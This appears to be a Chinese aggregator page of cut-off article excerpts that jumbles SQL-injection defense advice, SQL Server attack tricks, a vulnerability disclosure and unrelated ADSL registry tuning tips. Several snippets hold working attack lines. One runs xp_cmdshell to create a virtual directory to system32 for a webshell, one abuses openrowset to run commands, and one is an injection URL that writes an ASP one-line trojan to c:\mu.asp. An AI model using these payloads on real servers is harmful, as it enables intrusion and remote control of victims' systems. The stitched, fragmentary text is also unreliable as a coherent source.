【原文地址】Tip/Trick: Guard Against SQL Injection Attacks 【原文发表日期】 Saturday, September 30, 2006 9:11 AMSQL注入攻击是非常令人讨厌的安全漏洞，是所有的web开发人员，不管是什么平台，技术，还是数据层，需要确信他们理解和防止的东西。不幸的是，开发人员往往不集中花点时间在这上面，以至他们的应用，更糟糕的是，他们的客户极其容易受到攻击。Michael Sutton 最近...

<script language="vbscript">         function checkstr(strname)             strn=trim(strname.value)          &nbs...

sql注入建立虚拟目录，免得找web绝对路径----------------------------------------------------------------我们很多情况下都遇到sql注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：execmaster.dbo.xp_cmdshell'cscriptC:\Interpub\AdminScripts\mkwebdir.vbs-clocalhost-w"l"-v"win","c:\winnt\system32"'建立虚拟目录win,指向c:\winnt\system32exec...

文章中的信息适用于:  Microsoft Data Access Components versions 1.5, 2.0, 2.1, 2.5  Active Server Pages  Microsoft Visual InterDev, version 1.0  -------------------------------------------------------...

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错： exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"’ 建立虚拟目录win,指向c:\winnt\sy...

本来是投稿文章来的,因为稿件的问题所以就上不了杂志,再加上最近有些人在网站留言说三道四的猜测蓝雨的问题,所以我就公开漏洞预警所说的漏洞,官方已经把版本都打了补丁,当然有些使用网站至今还是存在着SQL注入漏洞的,所以一切后果与我以及BCT小组无关 最近无聊，在网上走来走去看看。发现现在的整站系统可是越来越多了，修改版本等等的N多阿！而蓝雨设计整站的使用者也越来越多了，蓝雨整站系统是从NOWA 0.94修改而来的！基于NOWA的系统不单指蓝雨一个还有很多的！我在此就不一一列举了，核心都是一样，只是程序的附加功能就各自不同！安全方面因为基于NOWA的系统所以到目前知道的漏洞就只有...

下面我要谈到一些Sqlserver新的Bug，虽然本人经过长时间的努力，当然也有点幸运的成分在内，才得以发现，不敢一个人独享，拿出来请大家鉴别。 1．关于Openrowset和Opendatasource 可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下： select * from openrowset(’sqloledb’,’myserver’;’sa’;’’,’select * from table’) 可见（即使从字面意义上...

 1、   用^转义字符来写ASP(一句话木马)文件的方法:?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell ’echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp’;-- ? &nb...

　　我们在使用一件产品时总希望能发挥产品的最大功效。我们宽带上网也是同样心理，怎样才能使ADSL的速度最快，效果最好呢？在现有硬件条件下我们只能尽量优化！　　Windows系列在安装时，默认的是针对以太网的设置，在TCP/IP数据包传送过程中就会把一些无用功做在了分包和组合以适应ISP。虽然ADSL使用PPPoE协议，具有局域网的特点，但是又不完全等于局域网协议，所以还是有优化的余地，我们可以通过修改注册表中有关参数，使系统针对ADSL进行优化。具体的参数有MaxMTU、DefaultRcvWin等等，这种优化的以后能够使ADSL适应ISP的网络参数，最大限度提高ADSL工作效率。打开注册表　...

　　ADSL优化势在必行，前面我们已经介绍过ADSL注册表简易优化法(通用法)。现特别针对使用Win9x/ME的用户，我们优化策略介绍如下：　　做这些修改之前请先做好注册表的备份，以便不适合你的情况的时候或修改错误时恢复。同时这里所介绍的优化办法由于各地网络的不同不保证在您那里一定发挥作用。　　Windows9x/ME优化注册表　　打开注册表编辑器（开始菜单->运行->输入regedit->确定）在以下几个项目加入如下几个值：　　1.HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans\000n...

　　ADSL优化势在必行，前面我们已经介绍过ADSL注册表简易优化法(通用法)。现特别针对使用windowsXP的用户，我们优化策略介绍如下：(注意：本方法只适用于PPPoE方式的ADSL用户)　　在做这些修改之前请先做好注册表的备份，以便不适合你的情况的时候或修改错误时恢复同时这里所介绍的优化办法由于各地网络的不同不保证在您那里一定发挥作用。　　WindowsXP优化注册表　　WindowsXP自带PPPoE拨号，更加全面优化了网络的连接，所以我们可以优化的地方大大减少，根据目前所掌握的微软官方资料，我们仍然可以对以下几个地方进行合适自己的优化调整。　　打开注册表编辑器（开始菜单->运...